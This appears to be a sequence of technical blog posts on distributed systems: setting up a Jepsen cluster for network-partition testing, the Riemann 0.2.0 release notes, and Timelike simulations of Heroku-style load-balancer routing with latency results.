If you're writing to ZooKeeper, you might have a stronger set of guarantees: the write is visible now to all participants, for instance, and that the write will survive the total failure of up to n/2 - 1 nodes. If you write to Postgres, depending on your transaction's consistency level, you might be able to guarantee that the write will be visible to everyone, just to yourself, or “eventually”.

These guarantees are particularly tricky to understand when the network is unreliable.

Partitions

Formal proofs of distributed systems often assume that the network is asynchronous, which means the network may arbitrarily duplicate, drop, delay, or reorder messages between nodes. This is a weak hypothesis: some physical networks can do better than this, but in practice IP networks will encounter all of these failure modes, so the theoretical limitations of the asynchronous network apply to real-world systems as well.


In practice, the TCP state machine allows nodes to reconstruct “reliable” ordered delivery of messages between nodes. TCP sockets guarantee that our messages will arrive without drops, duplication, or reordering. However, there can still be arbitrary delays–which would ordinarily cause the distributed system to lock indefinitely. Since computers have finite memory and latency bounds, we introduce timeouts, which close the connection when expected messages fail to arrive within a given time frame. Calls to read() on sockets will simply block, then fail.


Detecting network failures is hard. Since our only knowledge of the other nodes passes through the network, delays are indistinguishable from failure. This is the fundamental problem of the network partition: latency high enough to be considered a failure. When partitions arise, we have no way to determine what happened on the other nodes: are they alive? Dead? Did they receive our message? Did they try to respond? Literally no one knows. When the network finally heals, we'll have to re-establish the connection and try to work out what happened–perhaps recovering from an inconsistent state.

Many systems handle partitions by entering a special degraded mode of operation. The CAP theorem tells us that we can either have consistency (technically, linearizability for a read-write register), or availability (all nodes can continue to handle requests), but not both. What's more, few databases come close to CAP's theoretical limitations; many simply drop data.

In this series, I'm going to demonstrate how some real distributed systems behave when the network fails. We'll start by setting up a cluster and a simple application. In each subsequent post, we'll explore that application written for a particular database, and how that system behaves under partition.

Setting up a cluster


You can create partitions at home! For these demonstrations, I'm going to be running a five node cluster of Ubuntu 12.10 machines, virtualized using LXC–but you can use real computers, virtual private servers, EC2, etc. I've named the nodes n1, n2, n3, n4, and n5: it's probably easiest to add these entries to /etc/hosts on your computer and on each of the nodes themselves.

We're going to need some configuration for the cluster, and client applications to test their behavior. You can clone http://github.com/aphyr/jepsen to follow along.

To run commands across the cluster, I'm using Salticid (http://github.com/aphyr/salticid). I've set my ~/.salticidrc to point to configuration in the Jepsen repo:

load ENV['HOME'] + '/jepsen/salticid/*.rb'

If you take a look at this file, you'll see that it defines a group called :jepsen, with hosts n1 … n5. The user and password for each node is 'ubuntu'–you'll probably want to change this if you're running your nodes on the public internet.

Try salticid -s salticid to see all the groups, hosts, and roles defined by the current configuration:

$ salticid -s salticid
Groups
  jepsen
Hosts:
  n1 n2 n3 n4 n5
Roles
  base riak mongo redis postgres jepsen net
Top-level tasks

First off, let's set up these nodes with some common software–compilers, network tools, etc.

salticid base.setup

The base role defines some basic operating system functions. base.reboot will reboot the cluster, and base.shutdown will unpower it.

The jepsen role defines tasks for simulating network failures. To cause a partition, run salticid jepsen.partition. That command causes nodes n1 and n2 to drop IP traffic from n3, n4, and n5–essentially by running

iptables -A INPUT -s n3 -j DROP
iptables -A INPUT -s n4 -j DROP
iptables -A INPUT -s n5 -j DROP

That's it, really. To check the current network status, run jepsen.status. jepsen.heal will reset the iptables chains to their defaults, resolving the partition.

To simulate slow networks, or networks which drop packets, we can use tc to adjust the ethernet interface. Jepsen assumes the inter-node interface is eth0. salticid jepsen.slow will add latency to the network, making it easier to reproduce bugs which rely on a particular message being dropped. salticid jepsen.flaky will probabilistically drop messages. Adjusting the inter-node latency and lossiness simulates the behavior of real-world networks under congestion, and helps expose timing dependencies in distributed algorithms–like database replication.

A simple distributed system


In order to test a distributed system, we need a workload–a set of clients which make requests and record their results for analysis. For these posts, we're going to work with a simple application which writes several numbers to a list in a database. Each client app will independently write some integers to the DB. With five clients, client 0 writes 0, 5, 10, 15, …; client 1 writes 1, 6, 11, and so on.

For each write we record whether the database acknowledged the write successfully or whether there was an error. At the end of the run, we ask the database for the full set. If acknowledged writes are missing, or unacknowledged writes are present, we know that the system was inconsistent in some way: that the client application and the database disagreed about the state of the system.
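The bookkeeping is simple set arithmetic; here's a Python sketch of the analysis step (the Jepsen apps themselves are written in Clojure):

```python
# Compare the writes the clients believe succeeded against the set the
# database actually returns at the end of the run.

def analyze(attempted, acknowledged, survivors):
    lost = acknowledged - survivors     # acked but missing: data loss
    unacked = survivors - acknowledged  # present but "failed": false negatives
    return {"total": len(attempted),
            "acknowledged": len(acknowledged),
            "survivors": len(survivors),
            "lost": sorted(lost),
            "unacknowledged": sorted(unacked)}

attempted    = set(range(10))
acknowledged = {0, 1, 2, 3, 4, 5, 6, 8}   # writes 7 and 9 reported errors
survivors    = {0, 1, 2, 3, 4, 5, 7, 8}   # 6 vanished; 7 actually landed

print(analyze(attempted, acknowledged, survivors))
# lost: [6]; unacknowledged: [7]
```

Lost writes indicate the database broke its acknowledgement promise; unacknowledged survivors show that a reported error doesn't mean the write failed.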

In this series of blog posts, we're going to run this app against several distributed databases, and cause partitions during its run. In each case, we'll see how the system responds to the uncertainty of dropped messages.

I've written several implementations of this workload in Clojure. jepsen/src/jepsen/set_app.clj defines the application. (defprotocol SetApp ...) lists the functions an app has to implement, and (run n apps) sets up the apps, runs them in parallel, collects results, and shows any inconsistencies. Particular implementations live in src/jepsen/riak.clj, pg.clj, redis.clj, and so forth.

You'll need a JVM and Leiningen 2 to run this code. Once you've installed lein, and added it to your path, we're ready to go!

Next up on Jepsen, we take a look at how PostgreSQL's transaction protocol handles network failures.

Riemann 0.2.0 is ready. There's so much left that I want to build, but this release includes a ton of changes that should improve usability for everyone, and I'm excited to announce its release.

Version 0.2.0 is a fairly major improvement in Riemann's performance and capabilities. Many things have been solidified, expanded, or tuned, and there are a few completely new ideas as well. There are a few minor API changes, mostly to internal structure–but a few streams are involved as well. Most functions will continue to work normally, but log a deprecation notice when used.

I dedicated the past six months to working on Riemann full-time. I was fortunate to receive individual donations as well as formal contracts with Blue Mountain Capital, SevenScale, and Iovation during that time. That money gave me months of runway to help make these improvements–but even more valuable was the feedback I received from production users, big and small. I've used your complaints, frustrations, and ideas to plan Riemann's roadmap, and I hope this release reflects that.

This release includes contributions from a broad cohort of open-source developers, and I want to recognize everyone who volunteered their time and energy to make Riemann better. In particular, I'd like to call out Pierre-Yves Ritschard, lwf, Ben Black, Thomas Omans, Dave Cottlehuber, and, well, the list goes on and on. You rock.

These months have seen not only improvements to Riemann itself, but to the dashboard, clients, and integration packages. While I'm spending most of my time working on the core Riemann server, it's really this peripheral software that make Riemann useful for instrumenting production systems. There's no way I could hope to understand, let alone write and test the code to integrate with all these technologies–which makes your work particularly valuable.

This week I started my new job at Factual. I won't be able to work 10 hours each day on Riemann any more, but I'm really happy with what we've built together, and I'll definitely keep working on the next release.

To all Riemann's users and contributors, thank you. Here's to 0.2.0.

New features

  • Arbitrary key-value (string) pairs on events
  • Hot config reloading
  • Integrated nrepl server
  • streams/sdo: bind together multiple streams as one
  • streams/split: like (cond), dispatch an event to the first matching stream
  • streams/splitp: like split, but on the basis of a specific predicate
  • config/delete-from-index: explicitly remove (similar) events from the index
  • streams/top: streaming top-k
  • streams/tag: add tags to events
  • RPM packaging
  • Init scripts, proper log dirs, and users for debian and RPM packages. Yeah, this means you can /etc/init.d/riemann reload, and Stuff Just Works ™.
  • folds/difference, product, and quotient.
  • Folds come in sloppy and strict variants which should “Do What I Mean” in most contexts.
  • Executor Services for asynchronous queued processing of events.
  • streams/exception-stream: captures exceptions and converts them to events.

Improvements

  • http://riemann.io site
  • Lots more documentation and examples
  • Config file syntax errors are detected early
  • Cleaned up server logging
  • Helpful messages (line numbers! filenames!) for configuration errors
  • Silence closed channel exceptions
  • Cores can preserve services like pubsub, the index, etc through reloads
  • Massive speedups in TCP and UDP server throughput
  • streams/rate works in real-time: no need for fill-in any more
  • Graphite client is faster, more complete
  • Config files can include other files by relative path
  • streams/coalesce passes on expired events
  • riemann.email/mailer can take custom :subject and :body functions
  • riemann.config includes some common time/scheduling functions
  • streams/where returns whether it matched an event, which means (where) is now re-usable as a predicate in lots of different contexts.
  • streams/tagged-any and tagged-all return whether they matched
  • streams/counter is resettable to a particular metric, and supports expiry
  • Bring back “hyperspace core online”
  • Update to netty 3.6.1
  • Reduced the number of threadpools used by the servers
  • Massive speedup in Netty performance by re-organizing execution handlers
  • core/reaper takes a :keep-keys option to specify which fields on an event are preserved
  • streams/smap ignores nil values for better use with folds
  • Update to aleph 0.3.0-beta15
  • Config files ship with emacs modelines, too

Bugfixes

  • Fixed a bug in part-time-fast causing undercounting under high contention
  • Catch exceptions while processing expired events
  • Fix a bug escaping metric names for librato
  • riemann.email/mailer can talk to SMTP relays again
  • graphite-path-percentiles will convert decimals of three or more places to percentile strings
  • streams/rollup is much more efficient; doesn't leak tasks
  • streams/rollup aggregates and forwards expired events instead of stopping
  • Fixed a threadpool leak from Netty
  • streams/coalesce: fixed a bug involving lazy persistence of transients
  • streams/ddt: fixed a few edge cases

Internals

  • Cleaned up the test suite's logging
  • Pluggable transports for netty servers
  • Cores are immutable
  • Service protocol: provides lifecycle management for internal components
  • Tests for riemann.config
  • riemann.periodic is gone; replaced by riemann.time
  • Tried to clean up some duplicated functions between core, config, and streams
  • riemann.common/deprecated
  • Cleaned up riemann.streams, removing unused commented-out code
  • Lots of anonymous functions have names now, to help with profiling
  • Composing netty pipeline factories is much simpler
  • Clojure 1.5

Known bugs

  • Passing :host to websocket-server does nothing: it binds to * regardless.
  • Folds/mean throws when it receives empty lists
  • graphite-server has no tests
  • Riemann will happily overload browsers via websockets
  • streams/rate doesn't stop its internal poller correctly when self-expiring
  • When Netty runs out of filehandles, it'll hang new connections

The Netty redesign of riemann-java-client made it possible to expose an end-to-end asynchronous API for writes, which dramatically improves throughput for messages containing a small number of events. By introducing a small queue of pipelined write promises, riemann-clojure-client can now push 65K events per second, as individual messages, over a single TCP socket. That works out to about 120 Mbps of sustained traffic.


I'm really happy about the bulk throughput too: three threads using a single socket, sending messages of 100 events each, can push around 185-200K events/sec, at over 200 Mbps. That throughput took 10 sockets and hundreds of threads to achieve in earlier tests.


This isn't a particularly useful feature as far as clients go; it's unlikely most users will want to push this much from a single client. It is critical, however, for optimizing Riemann's server performance. The server, running the bulk test, consumes about 115% CPU on my 2.5GHz Q8300. I believe this puts a million events/sec within reach for production hardware, though at that throughput CAS contention in the streams may become a limiting factor. If I can find a box (and network) powerful enough to test, I'd love to give it a shot!

This is the last major improvement for Riemann 0.2.0. I'll be focusing on packaging and documentation tomorrow. :)

In the previous post, I described an approximation of Heroku's Bamboo routing stack, based on their blog posts. Hacker News, as usual, is outraged that the difficulty of building fast, reliable distributed systems could prevent Heroku from building a magically optimal architecture. Coda Hale quips:

Really enjoying @RapGenius’s latest mix tape, “I Have No Idea How Distributed Systems Work”.

Coda understands the implications of the CAP theorem. This job is too big for one computer–any routing system we design must be distributed. Distribution increases the probability of a failure, both in nodes and in the network itself. These failures are usually partial, and often take the form of degradation rather than the system failing as a whole. Two nodes may be unable to communicate with each other, though a client can see both. Nodes can lie to each other. Time can flow backwards.

CAP tells us that under these constraints, we can pick two of three properties (and I'm going to butcher them in an attempt to be concise):

  1. Consistency: nodes agree on the system's state.
  2. Availability: the system accepts requests.
  3. Partition tolerance: the system runs even when the network delays or drops some messages.

In the real world, partitions are common, and failing to operate during a partition is essentially a failure of availability. We must choose CP or AP, or some probabilistic blend of the two.

There's a different way to talk about the properties of a distributed system–and I think Peter Bailis explains it well. Liveness means that at every point, there exists a sequence of operations that allows the “right thing” to happen–e.g. “threads are never deadlocked” or “you never get stuck in an infinite loop”. Safety means the system fails to do anything bad. Together, safety and liveness ensure the system does good things on time.

With this in mind, what kind of constraints apply to HTTP request routing?

  1. The system must be partition tolerant.
  2. The system must be available–as much as possible, anyway. Serving web pages slower is preferable to not serving them at all. In the language of CAP, our system must be AP.
  3. But we can't wait too long, because requests which take more than a minute to complete are essentially useless. We have a liveness constraint.
  4. Requests must complete correctly, or not at all. We can't route an HTTP POST to multiple servers at once, or drop pieces of requests on the floor. We have a safety constraint.

It's impossible to do this perfectly. If all of our data centers are nuked, there's no way we can remain available. If the network lies to us, it can be impractical to guarantee correct responses. And we can let latencies rise to accommodate failure: the liveness constraint is flexible.

Finally, we're real engineers. We're going to make mistakes. We have limited time and money, limited ability to think, and must work with existing systems which were never designed for the task at hand. Complex algorithms are extraordinarily difficult to prove–let alone predict–at scale, or under the weird failure modes of distributed systems. This means it's often better to choose a dumb but predictable algorithm over an optimal but complex one.

What I want to make clear is that Heroku is full of smart engineers–and if they're anything like the engineers I know, they're trying their hardest to adapt to a rapidly changing problem, fighting fires and designing new systems at the same time. Their problems don't look anything like yours or mine. Their engineering decisions are driven by complex and shifting internal constraints which we can't really analyze or predict. When I talk about “improved routing models” or “possible alternatives”, please understand that those models may be too complex, incompatible, or unpredictable to build in a given environment.

Dealing with unreliability

Returning to our Bamboo stack simulation, I'd like to start by introducing failure dynamics.

Real nodes fail. We'll make our dynos unreliable with the faulty function, which simulates a component which stays online for an exponentially-distributed time before crashing, then returns error responses instead of allowing requests to pass through. After another exponentially-distributed outage time, it recovers, and the process continues. You can interpret this as a physical piece of hardware, or a virtual machine, or a hot-spare scenario where another node spins up to take the downed one's place, etc. This is a fail-fast model–the node returns failure immediately instead of swallowing messages indefinitely. Since the simulations we're running are short-lived, I'm going to choose relatively short failure times so we can see what happens under changing dynamics.

(defn faulty-dyno []
  (cable 2
    ; Mean time before failure of 20 seconds, and
    ; mean time before resolution of one second.
    (faulty 20000 1000
      (queue-exclusive
        (delay-fixed 20
          (delay-exponential 100
            (server :rails)))))))
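This failure model is simple enough to sanity-check outside Timelike. Here's a hedged Python sketch (my own, not part of Timelike) that alternates exponentially-distributed up and down periods; the long-run availability should be mtbf / (mtbf + mttr), about 95.2% for these parameters:

```python
import random

def expected_availability(mtbf_ms, mttr_ms):
    # Long-run fraction of time a fail-fast component is up.
    return mtbf_ms / (mtbf_ms + mttr_ms)

def simulated_availability(mtbf_ms, mttr_ms, cycles, rng):
    # Alternate exponentially-distributed up and down periods.
    up   = sum(rng.expovariate(1.0 / mtbf_ms) for _ in range(cycles))
    down = sum(rng.expovariate(1.0 / mttr_ms) for _ in range(cycles))
    return up / (up + down)

print(expected_availability(20000, 1000))                       # ~0.952
print(simulated_availability(20000, 1000, 10000, random.Random(42)))
```

This is where the "95% available dynos" column below comes from.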

Again, we're using a pool of 250 dynos and a poisson-distributed load function. Let's compare a min-conn load balancer over a pool of perfect dynos vs a pool of faulty ones:

(test-node "Reliable min-conn -> pool of faulty dynos."
  (lb-min-conn
    (pool pool-size (faulty-dyno))))

                       Ideal dynos        95% available dynos
Total reqs:            100000             100000
Selected reqs:         50000              50000
Successful frac:       1.0                0.62632
Request rate:          678.2972 reqs/s    679.6156 reqs/s
Response rate:         673.90894 reqs/s   676.74567 reqs/s
Latency distribution:
  Min:                 24.0               4.0
  Median:              93.0               46.5
  95th %:              323.0              272.0
  99th %:              488.0              438.0
  Max:                 1044.0             914.0

Well that was unexpected. Even though our pool is 95% available, over a third of all requests fail. Because our faulty nodes fail immediately, they have smaller queues on average–and the min-conns load balancer routes more requests to them. Real load balancers like HAProxy keep track of which nodes fail and avoid routing requests to them. HAProxy uses active health checks, but for simplicity I'll introduce a passive scheme: when a request fails, don't decrement that host's connection counter immediately. Instead, wait for a while–say 1 second, the mean time to resolution for a given dyno. We can still return the error response immediately, so this doesn't stop the load balancer from failing fast, but it will reduce the probability of assigning requests to broken nodes.

(lb-min-conn :lb {:error-hold-time 1000}
  (pool pool-size (faulty-dyno)))

Total reqs:       100000
Selected reqs:    50000
Successful frac:  0.98846
Request rate:     678.72076 reqs/s
Response rate:    671.3302 reqs/s
Latency distribution:
  Min:     4.0
  Median:  92.0
  95th %:  323.0
  99th %:  486.0
  Max:     1157.0

Throughput is slightly lower than the ideal, perfect pool of dynos, but we've achieved 98% reliability over a pool of nodes which is only 95% available, and done it without any significant impact on latencies. This system is more than the sum of its parts.
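The hold-time trick can be sketched in a few lines of Python (my own sketch, not Timelike's or HAProxy's actual implementation): treat a failed request's connection slot as still occupied until the hold expires, so the least-connections rule naturally steers traffic elsewhere.

```python
import heapq

class MinConnBalancer:
    """Least-connections with a passive error hold: a failed request's
    connection slot stays occupied for hold_ms, steering traffic away
    from recently-failed backends."""

    def __init__(self, backends, hold_ms=1000):
        self.conns = {b: 0 for b in backends}   # open-connection counts
        self.hold_ms = hold_ms
        self.releases = []                      # heap of (release_time, backend)

    def _expire(self, now):
        while self.releases and self.releases[0][0] <= now:
            _, b = heapq.heappop(self.releases)
            self.conns[b] -= 1

    def acquire(self, now):
        self._expire(now)
        b = min(self.conns, key=lambda x: (self.conns[x], x))
        self.conns[b] += 1
        return b

    def release(self, backend, now, ok):
        if ok:
            self.conns[backend] -= 1
        else:
            # Error: hold the slot for hold_ms before freeing it.
            heapq.heappush(self.releases, (now + self.hold_ms, backend))

lb = MinConnBalancer(["a", "b"], hold_ms=1000)
x = lb.acquire(0)              # "a" (tie broken by name)
lb.release(x, 5, ok=False)     # error: "a" looks busy until t = 1005
print(lb.acquire(10))          # "b" -- the failed node is avoided
print(lb.acquire(2000))        # "a" -- the hold has expired
```

Note that the error response still returns immediately; only the balancer's bookkeeping is delayed.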

This system has an upper bound on its reliability: some requests must fail in order to determine which dynos are available. Can we do better? Let's wrap the load balancer with a system that retries requests on error, up to three requests total:

(test-node "Retry -> min-conn -> faulty pool"
  (retry 3
    (lb-min-conn :lb {:error-hold-time 1000}
      (pool pool-size (faulty-dyno)))))

Total reqs:       100000
Selected reqs:    50000
Successful frac:  0.99996
Request rate:     676.8098 reqs/s
Response rate:    670.16046 reqs/s
Latency distribution:
  Min:     12.0
  Median:  94.0
  95th %:  320.0
  99th %:  484.0
  Max:     944.0

The combination of retries, least-conns balancing, and diverting requests away from failing nodes allows us to achieve 99.996% availability with minimal latency impact. This is a great building block to work with. Now let's find a way to compose it into a large-scale distributed system.
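Retries compose naturally as wrappers around a node. A minimal Python sketch (names and response shape are mine, not Timelike's): if each attempt failed independently with probability p, three attempts would all fail with probability p³, which is why a couple of retries buys so many extra nines.

```python
def retry(n, node):
    """Wrap `node`: try up to n times, return the first success
    (or the final failure)."""
    def wrapped(req):
        for _ in range(n):
            resp = node(req)
            if resp.get("ok"):
                return resp
        return resp
    return wrapped

calls = {"n": 0}
def flaky(req):
    # Fails twice, then recovers -- like a dyno coming back up.
    calls["n"] += 1
    return {"ok": calls["n"] >= 3}

print(retry(3, flaky)({}))   # {'ok': True} on the third attempt
```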

Multilayer routing

Minimum-connections and round-robin load balancers require coordinated state. If the machines which comprise our load balancer are faulty, we might try to distribute the load balancer itself in a highly available fashion. That would require state coordination with low latency bounds–and the CAP theorem tells us this is impossible to do. We'd need to make probabilistic tradeoffs under partitions, like allowing multiple requests to flow to the same backend.

What if we punt on AP min-conns load balancers? What if we make them single machines, or CP clusters? As soon as the load balancer encountered a problem, it would become completely unavailable.

(defn faulty-lb [pool]
  (faulty 20000 1000
    (retry 3
      (lb-min-conn :lb {:error-hold-time 1000}
        pool))))

Let's model the Bamboo architecture again: a stateless, random routing layer on top, which allocates requests to a pool of 10 faulty min-conns load balancers, all of which route over a single pool of faulty dynos:

(test-node "Random -> 10 faulty lbs -> One pool"
  (let [dynos (dynos pool-size)]
    (lb-random
      (pool 10
        (cable 5
          (faulty-lb dynos))))))

Total reqs:       100000
Selected reqs:    50000
Successful frac:  0.9473
Request rate:     671.94366 reqs/s
Response rate:    657.87744 reqs/s
Latency distribution:
  Min:     10.0
  Median:  947.0
  95th %:  1620.0
  99th %:  1916.0
  Max:     3056.0

Notice that our availability dropped to 95% in the two-layer distributed model. This is a consequence of state isolation: because the individual least-conns routers don't share any state, they can't communicate about which nodes are down. That increases the probability that we'll allocate requests to broken dynos. A load balancer which performed active health checks wouldn't have this problem; but we can work around it by adding a second layer of retries on top of the stateless random routing layer:

(let [dynos (pool pool-size (faulty-dyno))]
  (retry 3
    (lb-random
      (pool 10
        (cable 5
          (faulty-lb dynos))))))

Total reqs:       100000
Selected reqs:    50000
Successful frac:  0.99952
Request rate:     686.97363 reqs/s
Response rate:    668.2616 reqs/s
Latency distribution:
  Min:     30.0
  Median:  982.0
  95th %:  1639.0
  99th %:  1952.01
  Max:     2878.0

This doesn't help our latency problem, but it does provide three nines availability! Not bad for a stateless routing layer on top of a 95% available pool. However, we can do better.
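A rough sanity check on that figure (assuming, unrealistically, that router failures and retry attempts are independent): with each least-conns router up for a mean of 20 seconds and down for 1, a single random pick lands on a dead router with probability 1/21, and three independent tries all fail with probability (1/21)³ ≈ 1.1 × 10⁻⁴ — the same order of magnitude as the measured 4.8 × 10⁻⁴ failure rate.

```python
a = 20.0 / 21.0        # router availability: 20 s up, 1 s to recover
p_fail = (1 - a) ** 3  # all three random picks hit a dead router
print(p_fail)          # ~1.1e-4
```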

homogenous.jpg

Isolating the least-conns routers from each other is essential to preserve liveness and availability. On the other hand, it means that they can't share state about how to efficiently allocate requests over the same dynos–so they'll encounter more failures, and queue multiple requests on the same dyno independently. One way to resolve this problem is to ensure that each least-conns router has a complete picture of its backends' state. We isolate the dynos from one another:

distinct.jpg

This has real tradeoffs! For one, an imbalance in the random routing topology means that some min-conns routers will have more load than their neighbors–and they can't re-route requests to dynos outside their pool. And since our min-conns routers are CP systems in this architecture, when they fail, an entire block of dynos is unroutable. We have to strike a balance between more dynos per block (efficient least-conns routing) and more min-conn blocks (reduced impact of a router failure).

Let's try 10 blocks of 25 dynos each:

(test-node "Retry -> Random -> 10 faulty lbs -> 10 pools"
  (retry 3
    (lb-random
      (pool 10
        (cable 5
          (faulty-lb
            (pool (/ pool-size 10)
              (faulty-dyno))))))))

Total reqs:       100000
Selected reqs:    50000
Successful frac:  0.99952
Request rate:     681.8213 reqs/s
Response rate:    677.8099 reqs/s
Latency distribution:
  Min:     30.0
  Median:  104.0
  95th %:  335.0
  99th %:  491.0
  Max:     1043.0

Whoah! We're still 99.9% available, even with a stateless random routing layer on top of ten 95%-available routers. Throughput is slightly down, but our median latency is nine times lower than the homogenous dyno pool.

single-distinct.png

I think system composition is important in distributed design. Every one of these components is complex. It helps to approach each task as an isolated system, and enforce easy-to-understand guarantees about that component's behavior. Then you can compose different systems together to make something bigger and more useful. In these articles, we composed an efficient (but nonscalable) CP system with an inefficient (but scalable) AP system to provide a hybrid of the two.

If you have awareness of your network topology and are designing for singlethreaded, queuing backends, this kind of routing system makes sense. However, it's only going to be efficient if you can situate your dynos close to their least-conns load balancer. One obvious design is to put one load balancer in each rack, and hook it directly to the rack's switch. If blocks are going to fail as a group, you want to keep those blocks within the smallest network area possible. If you're working in EC2, you may not have clear network boundaries to take advantage of, and correlated failures across blocks could be a real problem.

This architecture also doesn't make sense for concurrent servers–and that's a growing fraction of Heroku's hosted applications. I've also ignored the problem of dynamic pools, where dynos are spinning up and exiting pools constantly. Sadly I'm out of time to work on this project, but perhaps a reader will chime in with a model for distributed routing over concurrent servers–maybe with a nonlinear load model for server latencies?

Thanks for exploring networks with me!

For more on Timelike and routing simulation, check out part 2 of this article: everything fails all the time. There's also more discussion on Reddit.

RapGenius is upset about Heroku's routing infrastructure. RapGenius, like many web sites, uses Rails, and Rails is notoriously difficult to operate in a multithreaded environment. Heroku operates at large scale, and made engineering tradeoffs which gave rise to high latencies–latencies with adverse effects on customers. I'd like to explore why Heroku's Bamboo architecture behaves this way, and help readers reason about their own network infrastructure.

To start off with, here's a Rails server. Since we're going to be discussing complex chains of network software, I'll write it down as an s-expression:

(server :rails)

Let's pretend that server has some constant request-parsing overhead–perhaps 20 milliseconds–and an exponentially-distributed processing time with a mean of 100 milliseconds.

(delay-fixed 20 (delay-exponential 100 (server :rails)))

Heroku runs a Rails application in a virtual machine called a Dyno, on EC2. Since the Rails server can only do one thing at a time, the dyno keeps a queue of HTTP requests, and applies them sequentially to the rails application. We'll talk to the dyno over a 2-millisecond-long network cable.

(defn dyno []
  (cable 2
    (queue-exclusive
      (delay-fixed 20
        (delay-exponential 100
          (server :rails))))))

This node can process an infinite queue of requests at the average rate of 1 every 124 milliseconds (2 + 20 + 100 + 2). But some requests take longer than others. What happens if your request lands behind a different, longer request? How long do you, the user, have to wait?

Introducing Timelike

Surprise! This way of describing network systems is also executable code. Welcome to Timelike.

(cable 2 ...) returns a function which accepts a request, sleeps for 2 milliseconds, then passes the request to a child function–in this case, a queuing function returned by queue-exclusive. Then cable sleeps for 2 more milliseconds to simulate the return trip, and returns the response from queue-exclusive. The request (and response) are just a list of events, each one timestamped. The return value of each function, or “node”, is the entire history of a request as it passes through the pipeline.

Network node composition is function composition–and since they're functions, we can run them.

(let [responses (future*
                  ; In a new thread, generate poisson-distributed
                  ; requests. We want 10,000 total, spaced roughly
                  ; 150 milliseconds apart. Apply them to a single
                  ; dyno.
                  (load-poisson 10000 150 req (dyno)))]
  (prn (first @responses))
  (pstats @responses))

Timelike doesn't actually sleep for 150 milliseconds between requests. The openjdk and oracle schedulers are unreliable as it stands–and we don't actually need to wait that long to compute the value of this function. We just virtualize time for every thread in the network (in this case, a thread per request). All operations complete “immediately” according to the virtual clock, and the clock only advances when threads explicitly sleep. We can still exploit parallelism whenever two threads wake up at the same time, and advance the clock whenever there's no more work to be done at a given time. The scheduler will even detect deadlocks and allow the clock to advance when active threads are blocked waiting to acquire a mutex held by a thread which won't release it until the future… though that's a little slow. ;-)

The upside of all this ridiculous lisp is that you can simulate concurrent systems where the results are independent of wall-clock time, which makes it easier to compare parallel systems at different scales. You can simulate one machine or a network of thousands, and the dynamics are the same.

Here's an example request, and some response statistics. We discard the first and last parts of the request logs to avoid measuring the warm-up or cool-down period of the dyno queue.

[{:time 0} {:node :rails, :time 66}]

Total reqs:       10000
Selected reqs:    5000
Successful frac:  1.0
Request rate:     6.6635394 reqs/s
Response rate:    6.653865 reqs/s
Latency distribution:
  Min:     22.0
  Median:  387.0
  95th %:  1728.0
  99th %:  2894.11
  Max:     3706.0

Since the request and response rates are close, we know the dyno was stable during this time–it wasn't overloaded or draining its queue. But look at that latency distribution! Our median request took 3 times the mean, and some requests blocked for multiple seconds. Requests which stack up behind each other have to wait, even if they could complete quickly. We need a way to handle more than one request at a time.
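The queueing behavior of a single dyno is easy to reproduce outside Timelike with Lindley's recursion (a hedged sketch of my own; parameter names are mine): each request's wait is the previous wait, plus the previous service time, minus the arrival gap, floored at zero.

```python
import random

def simulate_queue(n, mean_gap_ms, fixed_ms, mean_service_ms, seed=0):
    """FIFO single server via Lindley's recursion:
    wait' = max(0, wait + service - gap). Service time is a fixed
    overhead plus an exponential component, like the dyno model."""
    rng = random.Random(seed)
    wait, latencies = 0.0, []
    for _ in range(n):
        service = fixed_ms + rng.expovariate(1.0 / mean_service_ms)
        latencies.append(wait + service)
        gap = rng.expovariate(1.0 / mean_gap_ms)
        wait = max(0.0, wait + service - gap)
    return latencies

# 10,000 requests ~150 ms apart, 20 ms fixed + exp(100 ms) service.
lats = sorted(simulate_queue(10000, 150, 20, 100))
print("median:", lats[len(lats) // 2])
print("95th:  ", lats[int(0.95 * len(lats))])
```

The percentiles should land in the same ballpark as the Timelike run above, even though the median service time alone is under 90 ms: most of the latency is time spent waiting behind other requests.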

How do you do that with a singlethreaded Rails? You run more server processes at once. In Heroku, you add more dynos. Each runs in parallel, so with n dynos you can (optimally) process n requests at a time.

(defn dynos
  "A pool of n dynos"
  [n]
  (pool n (dyno)))

There's those funny macros again.

Now you have a new problem: how do you get requests to the right dynos? Remember, whatever routing system we design needs to be distributed–multiple load balancers have to coordinate about the environment.

Random routing

Random load balancers are simple. When you get a new request, you pick a random dyno and send the request over there. In the infinite limit this is fine; a uniformly even distribution will distribute an infinite number of requests evenly across the cluster. But our systems aren't infinite. A random LB will sometimes send two, or even a hundred requests to the same dyno even when its neighbors go unused. That dyno's queue will back up, and everyone in that queue has to wait for all the requests ahead of them.

(lb-random (dynos 250))

Total reqs:       100000
Selected reqs:    50000
Successful frac:  1.0
Request rate:     1039.7172 reqs/s
Response rate:    1012.6787 reqs/s
Latency distribution:
  Min:     22.0
  Median:  162.0
  95th %:  631.0
  99th %:  970.0
  Max:     1995.0

A cool thing about random LBs is that they require little coordinated state. You don't have to agree with your peers about where to route a request. They also compose freely: a layer of random load balancers over another layer of random load balancers has exactly the same characteristics as a single random load balancer, assuming perfect concurrency. On the other hand, leaving nodes unused while piling up requests on a struggling dyno is silly. We can do better.
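The unevenness of random assignment is easy to see with a balls-in-bins sketch (Python; the numbers are hypothetical, chosen to match the 250-dyno pool): 1000 requests over 250 dynos average 4 per dyno, but the unluckiest dyno gets several times that.

```python
import random
from collections import Counter

rng = random.Random(7)
counts = Counter(rng.randrange(250) for _ in range(1000))
print(sum(counts.values()) / 250)   # mean load: 4.0 requests per dyno
print(max(counts.values()))         # the busiest dyno sees far more
```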

Round-Robin routing

Round-robin load balancers write down all their backends in a circular list (also termed a “ring”). The first request goes to the first backend in the ring; the second request to the second backend, and so forth, around and around. This has the advantage of evenly distributing requests, and it's relatively simple to manage the state involved: you only need to know a single number, telling you which element in the list to point to.
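The state involved really is just one counter. A minimal sketch (not Timelike's lb-rr, just the idea):

```python
class RoundRobin:
    """The only coordinated state is one index into the ring."""
    def __init__(self, backends):
        self.backends = backends
        self.i = 0

    def pick(self):
        b = self.backends[self.i]
        self.i = (self.i + 1) % len(self.backends)
        return b

rr = RoundRobin(["a", "b", "c"])
print([rr.pick() for _ in range(5)])   # ['a', 'b', 'c', 'a', 'b']
```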

(lb-rr (dynos 250))

Total reqs:       100000
Selected reqs:    50000
Successful frac:  1.0
Request rate:     1043.9939 reqs/s
Response rate:    1029.6116 reqs/s
Latency distribution:
  Min:     22.0
  Median:  105.0
  95th %:  375.0
  99th %:  560.0
  Max:     1173.0

